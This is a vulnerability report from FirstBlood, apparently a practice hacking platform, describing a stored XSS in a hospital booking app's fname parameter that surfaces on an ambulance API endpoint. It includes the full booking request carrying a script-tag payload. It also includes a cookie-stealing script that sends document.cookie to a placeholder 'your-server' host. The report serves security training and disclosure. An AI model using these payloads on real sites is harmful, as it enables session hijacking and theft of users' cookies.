FirstBlood-#1186Stored XSS on ambulance API
This issue was discovered on FirstBlood v3



On 2022-12-08, ayush1098 Level 8 reported:

Hello Team,

Summary:

I have found a Stored XSS on /api/ambulances.php endpoint in fname parameter. From reading the error, I knew that we have to create a appointmemt with ambulance=1 parameter while booking the appointment. The vale of name is reflected on the api endpoint which you can find it in the source code.

Steps To reproduce:

  1. Book a appointment and intercept the request.

  2. Add the ambulance=1 parameter and your payload in the fname parameter in the end of the request and book the appointment. The request should look like this.

POST /api/ba.php HTTP/1.1
Host: 8eb52721f54a-ayush1098.a.firstbloodhackers.com
Cookie: drps=56a87bb157ed7beab25e2950a
Content-Length: 173
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
Anti-Csrf: 70688-7155-95996
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://8eb52721f54a-ayush1098.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://8eb52721f54a-ayush1098.a.firstbloodhackers.com/book-appointment.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close

fname="><script>alert()</script>&lname=fsdf&address=sdfdsf&city=sfsf&phonenumber=ssdf&[email protected]&dob=12/23/2022&a1=sdfds&a2=fsfsf&a3=sdfs&message=dfdfs&slot=1&ambulance=1
  1. Now copy the id and visit the https://8eb52721f54a-ayush1098.a.firstbloodhackers.com/api/ambulances.php?select=<your-id>

You will see the magic box pop up after this.

We can use this apyload to steal the cookies of the admin user:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://your-server/?"+document.cookie;
</script>

Impact:

Cookie Stealing, Session Hijacking etc..

Thanks & Regards

Ayush Singh

P2 High

Endpoint: /api/ambulances.php

Parameter: fname

Payload: <script>alert()</script>


FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the users first/last name. For this to work the parameter ambulance=1 must be set